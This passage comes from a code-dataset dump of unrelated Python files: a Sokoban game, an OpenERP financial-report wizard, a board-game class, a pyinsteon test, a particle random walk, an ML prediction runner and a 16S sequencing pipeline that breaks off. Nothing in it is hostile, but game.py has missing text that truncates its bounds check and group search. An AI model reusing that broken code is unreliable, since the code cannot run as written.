print(\"*\", end = \"\")\n else:\n print(\"- \", end = '') \n\n \n print()\n\n #process Game\n \n\n\n move = input(\"Your move : W A S D ? E to Exit : \").upper()\n \n dx = 0\n dy = 0\n\n if move == \"W\" : \n print(\"Up\")\n dy = -1\n \n\n elif move == \"S\":\n dy = 1\n print(\"Down\")\n \n\n elif move == \"A\":\n dx = -1\n print(\"Left\")\n \n elif move == \"D\":\n dx = 1\n print(\"Right\")\n\n elif move == \"E\":\n print(\"Exit game\")\n playing = False\n\n else :\n print(\"Pls push W A S D - End game\")\n playing = False\n break\n \n\n move_on = True\n if 0 <= player[\"x\"] + dx < map_sokoban[\"size_x\"] \\\n and 0 <= player[\"y\"] + dy < map_sokoban[\"size_y\"]:\n\n #box move\n for box in boxes:\n \n \n if player[\"x\"] + dx == box[\"x\"] and player[\"y\"] + dy == box[\"y\"]:\n if 0 <= (box[\"x\"] + dx) < map_sokoban[\"size_x\"]\\\n and 0 <= (box[\"y\"]) + dy < map_sokoban[\"size_y\"]:\n move_on = True\n else:\n move_on = False\n\n for wall in walls:\n if box[\"x\"] + dx == wall[\"x\"] and box[\"y\"]+ dy == wall[\"y\"]:\n move_on = False\n\n for box2 in boxes:\n if box[\"x\"] + dx == box2[\"x\"] and box[\"y\"] + dy == box2[\"y\"]:\n move_on = False\n if move_on == True :\n box[\"x\"] += dx\n box[\"y\"] += dy\n \n\n #spceial item \n if player[\"x\"] == special_item[\"x\"] and player[\"y\"] == special_item[\"y\"]:\n special_item = { \"x\": -1, \"y\": -1 }\n\n walls = [{ \"x\": -1, \"y\": -1},]\n spc = True\n \n \n #player move \n for wall in walls:\n if player[\"x\"] + dx == wall[\"x\"] and player[\"y\"] + dy == wall[\"y\"]:\n move_on = False \n\n if move_on == True:\n player[\"x\"] += dx\n player[\"y\"] += dy\n \n\n #Check win\n win = True\n for box in boxes:\n if box not in destinations:\n win = False\n\n if win is True:\n print(\"You win !\")\n playing = False\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n # if 0 <= player[\"x\"] + dx < map_sokoban[\"size_x\"] \\\n # and 0 <= player[\"y\"] + dy < map_sokoban[\"size_y\"] :\n # player[\"x\"] += dx\n # player[\"y\"] += dy\n\n # #Move box\n # dichuyen = True\n # for box in boxes:\n # if box[\"x\"] == player[\"x\"] and box[\"y\"] == player[\"y\"]:\n # box[\"x\"] += dx\n # box[\"y\"] += dy \n \n # if player['x'] + dx == box['x'] and player['y'] + dy == box['y']:\n # if 0 <= (box['x'] + dx) < map_sokoban['size_x']\\\n # and 0 <= (box['y']) + dy) < map_sokoban['size_y']:\n # dichuyen = False\n \n \n \n\n\n #Check win\n win = True\n for box in boxes:\n if box not in destinations:\n win = False\n\n if win is True:\n print(\"You win !\")\n playing = False\n\n\n ","sub_path":"Session 5/sokoban/sokoban.py","file_name":"sokoban.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"575577035","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, osv, orm\nfrom tempfile import NamedTemporaryFile\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Border, Side, Font\nimport base64\nfrom openerp.tools.translate import _\n\n\nclass elote_financial_report_wizard(osv.osv_memory):\n _name = \"elote.financial.report.wizard\"\n _description = \"Financial report\"\n\n def _default_lot(self, cr, uid, ids, context=None):\n lot_obj = self.pool.get('elote.lote')\n open_lot_ids = lot_obj.search(cr, uid, [('state', '=', 'open')])\n return open_lot_ids and open_lot_ids[0] or False\n\n _columns = {\n 'lot_id': fields.many2one('elote.lote', string='Lot'),\n 'name': fields.char('File Name', readonly=True),\n 'data': fields.binary('File', readonly=True),\n 'state': fields.selection([('choose', 'choose'), # choose lot and supplier\n ('get', 'get')]) # get the file\n }\n\n _defaults = {\n 'state': 'choose',\n 'lot_id': _default_lot,\n }\n\n def generate_file(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n this = self.browse(cr, uid, ids)[0]\n form_data = self.read(cr, uid, ids, ['lot_id'])[0]\n\n lot = form_data['lot_id'][0]\n lote_obj = self.pool.get(\"elote.lote\").browse(cr, uid, lot, context=context)[0]\n\n messages_en = {\n 'Summary for approval': 'Summary for approval',\n 'Approved purchase orders by biblical society': 'Approved purchase orders by biblical society',\n 'Biblical Society': 'Biblical Society',\n 'Quantity': 'Quantity',\n 'Amount': 'Amount',\n 'Status': 'Status',\n 'Orders for approval': 'Orders for approval',\n 'Supplier': 'Supplier',\n 'Ref': 'Ref',\n 'ISBN': 'ISBN',\n 'Description': 'Description',\n 'Order Total': 'Order Total',\n 'Supplier Total': 'Supplier Total',\n 'BS Total': 'BS Total',\n 'draft': 'Draft PO',\n 'approved': 'Approved',\n 'confirmed': 'Waiting Approval',\n 'except_picking': 'Shipping Exception',\n 'except_invoice': 'Invoice Exception',\n 'dispatched': 'Dispatched',\n 'done': 'Done',\n 'consolidated': 'Consolidated',\n 'cancel': 'Cancelled',\n 'eLote Financial Report - ': 'eLote Financial Report - ',\n }\n messages_es = {\n 'Summary for approval': u'Resumen para aprobación',\n 'Approved purchase orders by biblical society': u'Órdenes de compra para aprobación por sociedad bíblica',\n 'Biblical Society': u'Sociedad Bíblica',\n 'Quantity': u'Cantidad',\n 'Amount': u'Monto',\n 'Status': u'Estado',\n 'Orders for approval': u'Órdenes para aprobación',\n 'Supplier': u'Centro de producción',\n 'Ref': u'# Orden',\n 'ISBN': u'ISBN',\n 'Description': u'Descripción',\n 'Order Total': u'Total Orden',\n 'Supplier Total': u'Total CP',\n 'BS Total': u'Total SB',\n 'draft': u'En borrador',\n 'approved': u'Aprobada',\n 'confirmed': u'Pendiente aprobación',\n 'except_picking': u'Excepción de envío',\n 'except_invoice': u'Excepción de facturación',\n 'dispatched': u'Despachada',\n 'done': 'Entregada',\n 'consolidated': u'Consolidada',\n 'cancel': u'Cancelada',\n 'eLote Financial Report - ': u'Reporte financiero eLote - ',\n }\n\n if self.pool.get('res.users').browse(cr, uid, uid).lang == 'es_ES':\n m = messages_es\n else:\n m = messages_en\n\n fileobj = NamedTemporaryFile('w+b')\n xlsfile = fileobj.name\n fileobj.close()\n\n border_top = Border(top=Side(style='thin'))\n border_bottom = Border(bottom=Side(style='thin'))\n font_bold = Font(bold=True)\n font_h1 = Font(size=18, bold=True)\n font_h2 = Font(size=14, bold=True)\n\n wb = Workbook()\n\n ws = wb.active\n ws.title = m['Summary for approval']\n\n row = 1\n ws.cell(row=row, column=1).value = m['Approved purchase orders by biblical society']\n ws.cell(row=row, column=1).font = font_h1\n\n row += 1\n ws.cell(row=row, column=1).value = lote_obj.name\n ws.cell(row=row, column=1).font = font_h2\n\n row += 1\n ws.cell(row=row, column=1).value = m['Biblical Society']\n ws.cell(row=row, column=2).value = m['Quantity']\n ws.cell(row=row, column=3).value = m['Amount']\n ws.cell(row=row, column=4).value = m['Status']\n for col_count in xrange(1, 5):\n ws.cell(row=row, column=col_count).font = font_bold\n ws.cell(row=row, column=col_count).border = border_bottom\n\n sql = \"\"\"\n SELECT s.name, sum(l.product_qty) AS quantity, sum(l.product_qty * l.price_unit_taxed) AS amount,\n CASE max(o.state)\n WHEN 'draft' THEN '\"\"\" + m['draft'] + \"\"\"'\n WHEN 'approved' THEN '\"\"\" + m['approved'] + \"\"\"'\n WHEN 'confirmed' THEN '\"\"\" + m['confirmed'] + \"\"\"'\n WHEN 'dispatched' THEN '\"\"\" + m['dispatched'] + \"\"\"'\n WHEN 'done' THEN '\"\"\" + m['done'] + \"\"\"'\n WHEN 'cancel' THEN '\"\"\" + m['cancel'] + \"\"\"'\n ELSE max(o.state) END\n AS status\n FROM purchase_order o\n JOIN res_users u\n ON u.id = o.create_uid\n JOIN res_partner p\n ON p.id = u.partner_id\n JOIN res_partner s\n ON s.id = p.parent_id\n AND s.customer\n JOIN purchase_order_line l\n ON l.order_id = o.id\n WHERE o.lote_id = %s\n AND o.state = 'confirmed'\n GROUP BY s.name\n ORDER BY s.name\n \"\"\"\n\n row += 1\n first_row = row\n cr.execute(sql, (lot,))\n for order_line in cr.dictfetchall():\n ws.cell(row=row, column=1).value = order_line['name']\n ws.cell(row=row, column=2).value = order_line['quantity']\n ws.cell(row=row, column=3).value = order_line['amount']\n ws.cell(row=row, column=4).value = order_line['status']\n ws.cell(row=row, column=2).number_format = '#,##0'\n ws.cell(row=row, column=3).number_format = '$#,##0.00'\n row += 1\n if row > first_row:\n ws.cell(row=row, column=2).value = \"=SUM(B\" + str(first_row) + \":B\" + str(row - 1) + \")\"\n ws.cell(row=row, column=2).number_format = '#,##0'\n ws.cell(row=row, column=3).value = \"=SUM(C\" + str(first_row) + \":C\" + str(row - 1) + \")\"\n ws.cell(row=row, column=3).number_format = '$#,##0.00'\n for col_count in xrange(1, 5):\n ws.cell(row=row, column=col_count).font = font_bold\n ws.cell(row=row, column=col_count).border = border_top\n\n ws2 = wb.create_sheet(title=m['Orders for approval'])\n row = 1\n ws2.cell(row=row, column=1).value = m['Approved purchase orders by biblical society']\n ws2.cell(row=row, column=1).font = font_h1\n\n row += 1\n ws2.cell(row=row, column=1).value = lote_obj.name\n ws2.cell(row=row, column=1).font = font_h2\n\n row += 1\n ws2.cell(row=row, column=1).value = m['Biblical Society']\n ws2.cell(row=row, column=2).value = m['Supplier']\n ws2.cell(row=row, column=3).value = m['Ref']\n ws2.cell(row=row, column=4).value = m['ISBN']\n ws2.cell(row=row, column=5).value = m['Description']\n ws2.cell(row=row, column=6).value = m['Quantity']\n ws2.cell(row=row, column=7).value = m['Amount']\n ws2.cell(row=row, column=8).value = m['Status']\n ws2.cell(row=row, column=9).value = m['Order Total']\n ws2.cell(row=row, column=10).value = m['Supplier Total']\n ws2.cell(row=row, column=11).value = m['BS Total']\n for col_count in xrange(1, 12):\n ws2.cell(row=row, column=col_count).font = font_bold\n ws2.cell(row=row, column=col_count).border = border_bottom\n\n sql = \"\"\"\n SELECT s.name, c.name AS supplier, o.name as ref, i.default_code as isbn, l.name AS description, l.product_qty AS quantity,\n l.product_qty * l.price_unit_taxed AS amount,\n CASE o.state\n WHEN 'draft' THEN '\"\"\" + m['draft'] + \"\"\"'\n WHEN 'approved' THEN '\"\"\" + m['approved'] + \"\"\"'\n WHEN 'confirmed' THEN '\"\"\" + m['confirmed'] + \"\"\"'\n WHEN 'dispatched' THEN '\"\"\" + m['dispatched'] + \"\"\"'\n WHEN 'done' THEN '\"\"\" + m['done'] + \"\"\"'\n WHEN 'cancel' THEN '\"\"\" + m['cancel'] + \"\"\"'\n ELSE o.state END\n AS status\n FROM purchase_order o\n JOIN res_partner c\n ON c.id = o.partner_id\n JOIN res_users u\n ON u.id = o.create_uid\n JOIN res_partner p\n ON p.id = u.partner_id\n JOIN res_partner s\n ON s.id = p.parent_id\n AND s.customer\n JOIN purchase_order_line l\n ON l.order_id = o.id\n JOIN product_product i\n ON i.id = l.product_id\n WHERE o.lote_id = %s\n AND o.state <> 'cancel'\n ORDER BY s.name, c.name, o.name, l.id\n \"\"\"\n\n ref = ''\n supplier = ''\n bs = ''\n row += 1\n first_row = row\n first_row_ref = row\n first_row_sup = row\n first_row_bs = row\n cr.execute(sql, (lot,))\n for order_line in cr.dictfetchall():\n if order_line['name'] != bs:\n if bs != '':\n ws2.cell(row=row - 1, column=11).value = \"=SUM(G\" + str(first_row_bs) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=11).font = font_bold\n ws2.cell(row=row - 1, column=11).number_format = '$#,##0.00'\n first_row_bs = row\n if order_line['supplier'] != supplier or order_line['name'] != bs:\n if supplier != '':\n ws2.cell(row=row - 1, column=10).value = \"=SUM(G\" + str(first_row_sup) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=10).font = font_bold\n ws2.cell(row=row - 1, column=10).number_format = '$#,##0.00'\n first_row_sup = row\n if order_line['ref'] != ref or order_line['supplier'] != supplier or order_line['name'] != bs:\n if ref != '':\n ws2.cell(row=row - 1, column=9).value = \"=SUM(G\" + str(first_row_ref) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=9).font = font_bold\n ws2.cell(row=row - 1, column=9).number_format = '$#,##0.00'\n first_row_ref = row\n bs = order_line['name']\n supplier = order_line['supplier']\n ref = order_line['ref']\n ws2.cell(row=row, column=1).value = order_line['name']\n ws2.cell(row=row, column=2).value = order_line['supplier']\n ws2.cell(row=row, column=3).value = order_line['ref']\n ws2.cell(row=row, column=4).value = order_line['isbn']\n ws2.cell(row=row, column=5).value = order_line['description']\n ws2.cell(row=row, column=6).value = order_line['quantity']\n ws2.cell(row=row, column=7).value = order_line['amount']\n ws2.cell(row=row, column=8).value = order_line['status']\n ws2.cell(row=row, column=6).number_format = '#,##0'\n ws2.cell(row=row, column=7).number_format = '$#,##0.00'\n row += 1\n if row > first_row:\n if ref != '':\n ws2.cell(row=row - 1, column=9).value = \"=SUM(G\" + str(first_row_ref) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=9).font = font_bold\n ws2.cell(row=row - 1, column=9).number_format = '$#,##0.00'\n ref = order_line['ref']\n first_row_ref = row\n if supplier != '':\n ws2.cell(row=row - 1, column=10).value = \"=SUM(G\" + str(first_row_sup) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=10).font = font_bold\n ws2.cell(row=row - 1, column=10).number_format = '$#,##0.00'\n supplier = order_line['supplier']\n first_row_sup = row\n if bs != '':\n ws2.cell(row=row - 1, column=11).value = \"=SUM(G\" + str(first_row_bs) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row - 1, column=11).font = font_bold\n ws2.cell(row=row - 1, column=11).number_format = '$#,##0.00'\n bs = order_line['name']\n first_row_bs = row\n ws2.cell(row=row, column=6).value = \"=SUM(F\" + str(first_row) + \":F\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=6).number_format = '#,##0'\n ws2.cell(row=row, column=7).value = \"=SUM(G\" + str(first_row) + \":G\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=7).number_format = '$#,##0.00'\n ws2.cell(row=row, column=9).value = \"=SUM(I\" + str(first_row) + \":I\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=9).number_format = '$#,##0.00'\n ws2.cell(row=row, column=10).value = \"=SUM(J\" + str(first_row) + \":J\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=10).number_format = '$#,##0.00'\n ws2.cell(row=row, column=11).value = \"=SUM(K\" + str(first_row) + \":K\" + str(row - 1) + \")\"\n ws2.cell(row=row, column=11).number_format = '$#,##0.00'\n for col_count in xrange(1, 12):\n ws2.cell(row=row, column=col_count).font = font_bold\n ws2.cell(row=row, column=col_count).border = border_top\n\n wb.save(filename=xlsfile)\n\n spreadsheet_file = open(xlsfile, \"rb\")\n binary_data = spreadsheet_file.read()\n spreadsheet_file.close()\n out = base64.b64encode(binary_data)\n self.write(cr, uid, ids, {\n 'state': 'get',\n 'name': m['eLote Financial Report - '] + lote_obj.name + \".xlsx\",\n 'data': out\n }, context=context)\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'elote.financial.report.wizard',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'target': 'new',\n }\n","sub_path":"elote_statistics/wizard/elote_financial_report_wizard.py","file_name":"elote_financial_report_wizard.py","file_ext":"py","file_size_in_byte":14697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"27524441","text":"\n\nclass Game:\n\n def __init__(self, dim, n_player):\n self.board = [[None]*dim for i in range(dim)]\n self.current_player = 0\n self.dimension = dim\n self.n_player = n_player\n\n def in_bounds(self, row, col):\n \"\"\"Returns True if row and column are within the board\"\"\"\n return 0<=row0:\n c = to_visit.pop()\n visited.add(c)\n yield c\n for i in self.neighbours(row, col):\n if i not in visited and self.board[i[0]][i[1]]==self.board[row][col]:\n to_visit.append(i)\n\n def clear_group(self, row, col):\n \"\"\"Removes a group from the board replacing it with empty spaces\"\"\"\n for i in self.group(row, col):\n self.board[i[0]][i[1]]=None\n\n def is_group_dead(self, row, col):\n \"\"\"Returns True if group at row, col is dead i.e. it doesn't have any\n free spaces around itself\"\"\"\n if not self.in_bounds(row, col):\n raise ValueError(\"Position is outside of the board\")\n if self.board[row][col] is None:\n return False\n\n for i in self.group(row, col):\n for j in self.neighbours(*i):\n if self.board[j[0]][j[1]] is None:\n return False\n return True\n\n def __str__(self):\n r = \"A {0}x{0} game with {1} players. Player {2} plays next \\n\".format(\n self.dimension, self.n_player, self.current_player)\n for i in self.board:\n for j in i:\n if j is None:\n r+='.'\n else:\n r+=chr(ord('0')+j)\n r+='\\n'\n return r\n","sub_path":"pygo/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"542057430","text":"\"\"\"Test All-Link Cleanup Failure Report.\"\"\"\nimport unittest\nfrom binascii import unhexlify\n\nfrom pyinsteon.address import Address\nfrom pyinsteon.constants import MessageId\n\n# pylint: disable=unused-import\n# flake8: noqa: F401\nfrom pyinsteon.handlers.all_link_cleanup_failure_report import (\n AllLinkCleanupFailureReport,\n)\nfrom tests import set_log_levels\nfrom tests.utils import hex_to_inbound_message\n\n\nclass TestAllLinkCleanupFailureReport(unittest.TestCase):\n \"\"\"Test All-Link Cleanup Failure Report.\"\"\"\n\n def setUp(self):\n \"\"\"Set up test.\"\"\"\n self.hex = \"02560304050607\"\n self.message_id = MessageId(0x56)\n self.error = int(0x03)\n self.group = int(0x04)\n self.address = Address(\"050607\")\n\n self.msg, self.msg_bytes = hex_to_inbound_message(self.hex)\n set_log_levels(\n logger=\"info\",\n logger_pyinsteon=\"info\",\n logger_messages=\"info\",\n logger_topics=False,\n )\n\n def test_id(self):\n \"\"\"Test Id.\"\"\"\n assert self.msg.message_id == self.message_id\n\n def test_bytes(self):\n \"\"\"Test bytes.\"\"\"\n assert bytes(self.msg) == unhexlify(self.hex)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_messages/test_inbound/test_all_link_cleanup_failure_report.py","file_name":"test_all_link_cleanup_failure_report.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"329204293","text":"from matplotlib.patches import Circle\nimport numpy as np\nimport random\n\n# MAX_X = 30\n# MAX_Y = 30\n# PARTICLES_AMOUNT = 1\n# FRAMES = 1000\n# FPS = 100\n\n\nclass Particle:\n\n def __init__(self, x, y, max_x, max_y):\n self.max_x = max_x\n self.max_y = max_y\n self.radius = 0.5\n self.right_movements = 0\n self.left_movements = 0\n self.up_movements = 0\n self.down_movements = 0\n self.r = np.array((x, y))\n\n\n @property\n def x(self):\n return self.r[0]\n\n @x.setter\n def x(self, value):\n self.r[0] = value\n\n @property\n def y(self):\n return self.r[1]\n\n @y.setter\n def y(self, value):\n self.r[1] = value\n\n def draw(self, ax):\n circle = Circle(xy=self.r, radius=self.radius)\n ax.add_patch(circle)\n return circle\n\n def out_of_boundery(self, step):\n next_r = self.r + step\n\n if next_r[0] + self.radius >= self.max_x or next_r[0] - self.radius < -self.max_x or next_r[1] + self.radius >= self.max_y \\\n or next_r[1] - self.radius < -self.max_y:\n return True\n return False\n\n def advance(self):\n random_value = random.uniform(0, 1)\n step = np.array((0, 0))\n\n if random_value < 0.25:\n step = np.array((1, 0))\n self.up_movements += 1\n elif random_value < 0.5:\n step = np.array((0, -1))\n self.down_movements += 1\n elif random_value < 0.75:\n step = np.array((-1, 0))\n self.left_movements += 1\n else:\n step = np.array((0, 1))\n self.right_movements += 1\n\n if not self.out_of_boundery(step):\n self.r += step\n","sub_path":"75.26 - Simulación/TP/TP1/Código/ejercicio_10/particle.py","file_name":"particle.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"282754573","text":"import os\nimport argparse\nimport numpy as np\nimport pandas as pd\nfrom metrics import eval_metrics, C_lst\n\n\n\ndef load_data(in_dir):\n data = np.load(in_dir)\n print('Loaded Emergency NYC data.. \\n Shape:', data.shape)\n\n # historical avg. - categorical occurence rate\n print('Historical occur rate:')\n ha = []\n\n for c in range(data.shape[-1]):\n neg, pos = np.bincount(data[:, :, :, c].flatten())\n occur_rate = pos / (neg + pos)\n ha.append(occur_rate)\n print(f' {C_lst[c]}: {round(occur_rate, 2) * 100}% (supports {pos})')\n\n return data, ha\n\n\ndef split_data(data, dates, delta_t):\n assert len(dates) == 4, 'Invalid dates input.. Please input a sequence with four items.' \\\n ' Input example: -date 20150101 20150531 20150601 20150630'\n train_start, train_end, test_start, test_end = dates # unpack dates\n day_timestep = int(24/delta_t) # number of timesteps per day\n\n dates_range = pd.date_range('20150101', '20151231').strftime('%Y%m%d').tolist() # date range covers entire dataset\n assert len(dates_range) == int(data.shape[0]/day_timestep)\n\n # train set\n start_index, end_index = dates_range.index(train_start), dates_range.index(train_end)\n trainSet = data[start_index*day_timestep:(end_index+1)*day_timestep]\n print(f'Train set {train_start}-{train_end}: {trainSet.shape}')\n # test set\n start_index, end_index = dates_range.index(test_start), dates_range.index(test_end)\n testSet = data[start_index*day_timestep:(end_index+1)*day_timestep]\n print(f'Test set {test_start}-{test_end}: {testSet.shape} \\n')\n\n return trainSet, testSet\n\n\ndef run_model(model_name, model_dir, trainSet, testSet, timestep):\n print(f'Running model {model_name}.. \\n Observing last {timestep} steps to predict next one step.')\n if model_name == 'VAR':\n from baseline.VAR import run_VAR\n y_true, y_pred = run_VAR(model_dir, trainSet, testSet, timestep)\n\n elif model_name == 'LR':\n from baseline.LR import run_LR\n y_true, y_pred = run_LR(model_dir, trainSet, testSet, timestep)\n\n elif model_name == 'LASSO':\n from baseline.LASSO import run_LASSO\n y_true, y_pred = run_LASSO(model_dir, trainSet, testSet, timestep)\n\n elif model_name == 'SVM':\n from baseline.SVM import run_SVM\n y_true, y_pred = run_SVM(model_dir, trainSet, testSet, timestep)\n\n else:\n raise Exception('Unknown model name..')\n\n return y_true, y_pred\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run ML models for emergency prediction')\n parser.add_argument('-in', '--in_dir', type=str, help='Input directory', default='../data')\n parser.add_argument('-model', '--model_name', type=str, help='Choose prediction model',\n choices=['LR', 'VAR', 'LASSO', 'SVM'], default='LR')\n parser.add_argument('-t', '--delta_t', type=int, default=4, help='Time interval in hour(s)')\n parser.add_argument('-l', '--seq_len', type=int, default=9, help='Sequence length of observation steps')\n parser.add_argument('-date', '--dates', type=str, nargs='+',\n help='Start/end dates of train/test sets. Test follows train.'\n ' Example: -date 20150101 20150531 20150601 20150630',\n default=['20150101', '20150531', '20150601', '20150630'])\n\n args = parser.parse_args()\n\n # input dir\n in_dir = os.path.join(args.in_dir, f'{args.delta_t}h', 'EmergNYC_bi_20x10.npy')\n # output dir\n out_dir = os.path.join('./baseline', args.model_name)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n # load data\n data, ha = load_data(in_dir)\n\n # split train/test sets\n trainSet, testSet = split_data(data, args.dates, args.delta_t)\n\n # run model\n y_true, y_pred = run_model(args.model_name, out_dir, trainSet, testSet, args.seq_len)\n\n # evaluate prediction performance\n eval_metrics(out_dir, args.dates[-2:], y_true, y_pred, ha)\n","sub_path":"model/main_ml.py","file_name":"main_ml.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"286915444","text":"\"\"\"\n\nOVERVIEW: \n\nScript to convert raw 16S sequencing data into OTU tables. Acts on a directory containing a summary file and the raw data.\nOutputs a directory with processing results.\n\n\"\"\"\n\nfrom __future__ import print_function\nfrom optparse import OptionParser\nimport numpy as np\nimport os, sys\nimport os.path\nimport math\nfrom string import ascii_lowercase\nimport multiprocessing as mp\nimport ntpath\nimport preprocessing_16S as OTU\nimport Formatting as frmt\nfrom CommLink import *\nfrom SummaryParser import *\nfrom Features import *\nimport pickle\nimport QualityControl as QC\n\n# Read in arguments for the script\nusage = \"%prog -i INPUT_DIR -o OUTPUT_DIR_FULLPATH\"\nparser = OptionParser(usage)\nparser.add_option(\"-i\", \"--input_dir\", type=\"string\", dest=\"input_dir\")\nparser.add_option(\"-o\", \"--output_dir\", type=\"string\", dest=\"output_dir\")\nparser.add_option(\"-p\", \"--primers_removed\", dest=\"primers_removed\", default='False')\nparser.add_option(\"-b\", \"--split_by_barcodes\", dest=\"split_by_barcodes\", default='False')\nparser.add_option(\"-m\", \"--multiple_files\", dest=\"multiple_raw_files\", default='False')\n(options, args) = parser.parse_args()\n\nif( not options.input_dir ):\n parser.error(\"No data directory specified.\")\n\n# Parse summary file\nsummary_file = options.input_dir + '/summary_file.txt'\nsummary_obj = SummaryParser(summary_file)\nsummary_obj.ReadSummaryFile()\ndataset_ID = summary_obj.datasetID\n\n# Pipe stdout and stderr to logfiles in the new directory\nsys.stdout = open('/home/ubuntu/logs/stdout_' + dataset_ID + '_proc_16S.log','w')\nsys.stderr = open('/home/ubuntu/logs/stderr_' + dataset_ID + '_proc_16S.log','w')\ndef warning(*objs):\n print(\"WARNING: \", *objs, file=sys.stderr)\n\n# Check for presence of metadata map - report if metadata is missing.\ntry:\n metadata_file = summary_obj.attribute_value_16S['METADATA_FILE']\nexcept:\n metadata_file = None\n warning(\"No metadata file found!! This will cause problems downstream...\")\n\n# If no output directory specified, default to $home/proc/\nhomedir = os.getenv(\"HOME\")\nif( not options.output_dir ):\n print(\"No output directory name specified. Writing to \" + homedir + \"/proc/ by default.\")\n options.output_dir = homedir + '/proc/' + dataset_ID + '_proc_16S'\n\n# Make a directory for the 16S processing results \nworking_directory = options.output_dir\ntry:\n os.system('mkdir ' + working_directory)\nexcept:\n print(\"Processing directory for this dataset already exists. Overwriting its contents.\")\n\n# If OTU clustering is to be performed, check for whether percent similarity was specified in summary file\ntry: \n similarity = float(summary_obj.attribute_value_16S['OTU_SIMILARITY'])\nexcept:\n similarity = 97.0\n\n\n# Extract file locations\nprimers_file = options.input_dir + '/' + summary_obj.attribute_value_16S['PRIMERS_FILE']\nbarcodes_map = options.input_dir + '/' + summary_obj.attribute_value_16S['BARCODES_MAP']\ntry:\n raw_data_file = options.input_dir + '/' + summary_obj.attribute_value_16S['RAW_FASTQ_FILE']\n raw_file_type = 'FASTQ'\nexcept:\n print(\"No single raw FASTQ file found. Checking for raw FASTA.\")\n try:\n raw_data_file = options.input_dir + '/' + summary_obj.attribute_value_16S['RAW_FASTA_FILE']\n raw_file_type = 'FASTA'\n except:\n print(\"No single raw FASTA file found either. Checking for multiple files.\")\n try:\n raw_data_summary_file = os.path.join(options.input_dir, summary_obj.attribute_value_16S['RAW_FASTQ_FILES'])\n raw_file_type = 'FASTQ'\n except:\n print(\"No filename of multiple raw FASTQs map provided. Check contents of your raw data and summary file.\")\n raise NameError(\"Unable to retrieve raw sequencing files.\")\n\n# Construct output filenames from dataset ID\nfastq_trimmed_qual = working_directory + '/' + dataset_ID + '.raw_trimmed_qual.fastq'\nfasta_trimmed = working_directory + '/' + dataset_ID + '.raw_trimmed.fasta'\nfastq_trimmed_length = working_directory + '/' + dataset_ID + '.raw_length_trimmed.fastq'\nfastq_trimmed_primers = working_directory + '/' + dataset_ID + '.raw_primers_trimmed.fastq'\nfastq_split_by_barcodes = working_directory + '/' + dataset_ID + '.raw_split_by_barcodes.fastq'\nfasta_dereplicated = working_directory + '/' + dataset_ID + '.raw_dereplicated.fasta'\ndereplication_map = working_directory + '/' + dataset_ID + '.dereplication_map'\n\nOTU_clustering_results = working_directory + '/' + dataset_ID + '.otu_clustering.' + str(int(similarity)) + '.tab'\nOTU_table = working_directory + '/' + dataset_ID + '.otu_table.' + str(int(similarity))\nOTU_sequences_fasta = working_directory + '/' + dataset_ID + '.otu_seqs.' + str(int(similarity)) + '.fasta'\nOTU_sequences_table = working_directory + '/' + dataset_ID + '.otu_seqs.' + str(int(similarity)) + '.table'\noligotype_table_filename = working_directory + '/' + dataset_ID + '.oligotype_table.' + str(int(similarity)) + '.classic'\n\n# Get ASCII encoding of FASTQ files\ntry:\n encoding = summary_obj.attribute_value_16S['ASCII_ENCODING']\nexcept:\n encoding = ''\n\nif(encoding == \"ASCII_BASE_33\"):\n print(\"ASCII 33 encoding for quality scores specified.\")\n ascii_encoding = 33\nelif(encoding == \"ASCII_BASE_64\"):\n print (\"ASCII 64 encoding for quality scores specified.\")\n ascii_encoding = 64\nelse:\n print (\"No ASCII encoding specified in the summary file for the quality scores in the FASTQ file. Using ASCII 64 as default.\")\n warning(\"No ASCII encoding specified in the summary file for the quality scores in the FASTQ file. Using ASCII 64 as default.\")\n ascii_encoding = 64\n\n\n# Parallel steps:\n# 1. split fastq into chunks\n# 2. demultiplex (sort by barcodes), remove primers, and trim, and convert to fasta format\n# 3. recombine into a single fasta file before dereplicating\n\nos.chdir(working_directory)\n\n\n# Checkpoint - single or multiple raw files? If multiple, the assumption is they are demultiplexed, where each raw file corresponds to a single sample's reads.\nif options.multiple_raw_files == 'False':\n\n # Step 1.1 - get raw data filesize, then split into ~10Mb pieces (100000 lines) if smaller than 100 Mb, or into ~100Mb pieces (1000000 lines) otherwise. Can optimize this eventually\n # to split according to the number of cpus.\n rawfilesize = os.path.getsize(raw_data_file)\n\n # Step 1.1 - split file into 1000000 line (~100Mb) chunks\n if(rawfilesize < 2e8):\n os.system('split -l 100000 ' + raw_data_file)\n else:\n os.system('split -l 1000000 ' + 